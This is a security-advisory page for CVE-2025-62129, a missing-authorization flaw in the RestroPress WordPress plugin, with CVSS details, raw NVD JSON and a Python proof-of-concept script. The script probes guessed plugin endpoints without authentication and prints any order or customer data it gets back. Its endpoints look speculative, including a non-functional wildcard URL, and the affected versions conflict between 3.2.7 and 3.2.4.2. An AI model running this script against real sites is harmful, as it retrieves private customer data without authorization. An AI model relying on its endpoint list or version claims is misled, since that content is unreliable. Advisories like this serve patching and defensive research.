Security Vulnerability Report
中文
CVE-2025-62129 CVSS 5.3 MEDIUM

CVE-2025-62129

Published: 2025-12-31 16:15:45
Last Modified: 2026-04-23 15:34:36

Description

Missing Authorization vulnerability in Magnigenie RestroPress restropress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RestroPress: from n/a through <= 3.2.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Magnigenie RestroPress <= 3.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62129 PoC - Magnigenie RestroPress Authorization Bypass # Affected: RestroPress <= 3.2.7 # This PoC demonstrates the missing authorization vulnerability import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is running vulnerable RestroPress plugin """ # Common RestroPress endpoints that may be affected vulnerable_endpoints = [ "/wp-json/restropress/v1/orders", "/wp-json/restropress/v1/settings", "/wp-json/restropress/v1/customers", "/wp-admin/admin-ajax.php?action=rpress_*", ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-62129 - RestroPress Authorization Bypass\n") for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: # Send request without authentication response = requests.get(url, timeout=10, verify=False) print(f"[+] Endpoint: {endpoint}") print(f" Status Code: {response.status_code}") # Check if we got unauthorized access or data if response.status_code == 200: print(f" [!] VULNERABLE - Could access endpoint without authentication") print(f" Response preview: {response.text[:200]}...") elif response.status_code == 401 or response.status_code == 403: print(f" [+] Protected (Expected behavior)") else: print(f" [*] Status: {response.status_code}") print() except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}\n") def exploit_example(target_url): """ Example of how the vulnerability could be exploited """ print("\n[*] Attempting to retrieve order data without authentication...") # Try to access orders endpoint order_url = target_url.rstrip('/') + "/wp-json/restropress/v1/orders" try: response = requests.get(order_url, timeout=10, verify=False) if response.status_code == 200: print("[!] SUCCESS - Unauthorized access to order data achieved") print(f"[+] Retrieved data: {response.text}") return True except Exception as e: print(f"[-] Exploitation failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-62129-poc.py <target_url>") print("Example: python cve-2025-62129-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target) exploit_example(target) print("\n[*] Remediation: Upgrade to RestroPress > 3.2.7") print("[*] Reference: https://patchstack.com/database/Wordpress/Plugin/restropress")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62129", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:45.313", "lastModified": "2026-04-23T15:34:35.687", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Magnigenie RestroPress restropress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RestroPress: from n/a through <= 3.2.7."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en Magnigenie RestroPress permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a RestroPress: desde n/a hasta 3.2.4.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/restropress/vulnerability/wordpress-restropress-plugin-3-2-4-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}